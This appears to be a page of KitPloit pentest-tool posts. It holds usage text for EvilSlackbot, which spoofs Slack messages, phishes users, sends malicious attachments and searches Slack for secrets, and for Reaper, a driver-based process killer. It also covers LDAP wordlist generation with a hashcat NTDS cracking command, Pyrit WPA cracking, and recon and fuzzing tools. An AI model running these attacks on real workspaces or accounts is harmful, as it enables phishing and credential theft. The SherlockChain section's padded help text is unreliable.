    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide a xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R β€” June 1st 2024 at 12:30


    Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

          ____
    / __ \___ ____ _____ ___ _____
    / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
    / _, _/ __/ /_/ / /_/ / __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337

    Demonstration

    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R β€” May 31st 2024 at 12:30



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initalize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URL's (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

    Frequently Asked Questions

    Coming soon...



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Headerpwn - A Fuzzer For Finding Anomalies And Analyzing How Servers Respond To Different HTTP Headers

    By: Zion3R β€” May 30th 2024 at 12:30

    Install

    To install headerpwn, run the following command:

    go install github.com/devanshbatham/headerpwn@v0.0.3

    Usage

    headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:

    1. Provide the target URL using the -url flag.
    2. Create a file containing the headers you want to test, one header per line. Use the -headers flag to specify the path to this file.

    Example usage:

    headerpwn -url https://example.com -headers my_headers.txt
    • Format of my_headers.txt should be like below:
    Proxy-Authenticate: foobar
    Proxy-Authentication-Required: foobar
    Proxy-Authorization: foobar
    Proxy-Connection: foobar
    Proxy-Host: foobar
    Proxy-Http: foobar

    Proxying requests through Burp Suite:

    Follow following steps to proxy requests through Burp Suite:

    • Export Burp's Certificate:

      • In Burp Suite, go to the "Proxy" tab.
      • Under the "Proxy Listeners" section, select the listener that is configured for 127.0.0.1:8080
      • Click on the "Import/ Export CA Certificate" button.
      • In the certificate window, click "Export Certificate" and save the certificate file (e.g., burp.der).
    • Install Burp's Certificate:

      • Install the exported certificate as a trusted certificate on your system. How you do this depends on your operating system.
      • On Windows, you can double-click the .cer file and follow the prompts to install it in the "Trusted Root Certification Authorities" store.
      • On macOS, you can double-click the .cer file and add it to the "Keychain Access" application in the "System" keychain.
      • On Linux, you might need to copy the certificate to a trusted certificate location and configure your system to trust it.

    You should be all set:

    headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080

    Credits

    The headers.txt file is compiled from various sources, including the SecLists">Seclists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R β€” May 29th 2024 at 12:30


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

    Β 

    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

    You will get the following output if using the Python version:

    You will get the following output if using the Powershell version:


    Cracking passwords

    Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no- pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R β€” May 28th 2024 at 12:30


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R β€” May 27th 2024 at 12:30


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    ## Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
